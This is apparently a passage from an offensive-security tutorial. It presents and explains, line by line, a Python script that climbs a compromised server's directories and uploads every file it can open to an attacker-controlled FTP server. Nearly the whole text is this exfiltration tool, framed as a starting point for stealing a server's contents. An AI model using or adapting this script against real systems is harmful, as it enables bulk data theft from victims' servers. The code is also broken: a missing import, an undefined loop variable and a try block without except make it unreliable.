This script is a quick and dirty file-theft tool. It runs in a straight line up the directories, nabbing everything it comes into contact with. It then exports these to an FTP directory that it's pointed at. In situations where you can drop a file and want to quickly get the contents of the server, this is ideal as a starting point.
We will create a script that connects to an FTP, grabs the files in the current directory, and exports them to the FTP. It then jumps up into the next directory and repeats. When it encounters two directory listings that are the same (that is, it has hit the root), it stops.
For this, you will need a functioning FTP server. I'm using vsftpd, but you may use whatever you please. You'll need to either hard code the credentials into the script (not advisable) or send them with the credentials as flags.
The script we will be using is as follows:
from ftplib import FTP
import time
import os
user = sys.argv[1]
pw = sys.argv[2]
ftp = FTP("127.0.0.1", user, pw)
filescheck = "aa"
loop = 0
up = "../"
while 1:
files = os.listdir("./"+(i*up))
print files
for f in files:
try:
fiile = open(f, 'rb')
ftp.storbinary('STOR ftpfiles/00'+str(f), fiile)
fiile.close()
else:
pass
if filescheck == files:
break
else:
filescheck = files
loop = loop+1
time.sleep(10)
ftp.close()As ever, we import our libraries and set up our variables. We have set the username and password as sys.argv to avoid having to hard code and therefore expose our systems:
from ftplib import FTP import time import os user = sys.argv[1] pw = sys.argv[2]
We then connect to our FTP with an IP address and the credentials we set up through the flags. You can also pass the IP as sys.argv to avoid hard-coding:
ftp = FTP("127.0.0.1", user, pw)I've set up a nonce value that won't match the first directory for the directory checking method. We also set the loop as 0 and configure the "up directory" command as a variable, similar to the directory traversal script in Chapter 3, Vulnerability Identification:
filescheck = "aa" loop = 0 up = "../"
We then create our main loop to repeat forever and create our chosen directory call. We list the files in the directory we call and assign it a variable. You can opt to print the file listing here if you wish, as I have for diagnostic purposes, but it makes no difference:
while 1:
files = os.listdir("./"+(i*up))
print filesFor each file detected in the directory, we attempt to open it. It's important we open the file with rb as this allows it to be read as a binary, making it available to be transferred as a binary. If it's openable, we transfer it to the FTP with the storbinary command. We then close the file to complete the transaction:
try:
fiile = open(f, 'rb')
ftp.storbinary('STOR ftpfiles/00'+str(f), fiile)
fiile.close()If, for whatever reason, we can't open or transfer the file, we simply move on to the next one in the list:
else:
passWe then check to see whether we have changed directories since the last command. If not, we break out of the main loop:
if filescheck == files:
breakIf the directory listing doesn't match, we set the filecheck variable to match the current directory, iterate the loop by 1, and sleep for 10 seconds to avoid spamming the server:
else:
filescheck = files
loop = loop+1
time.sleep(10)Finally, once everything else is complete, we close our connection to the FTP server:
ftp.close()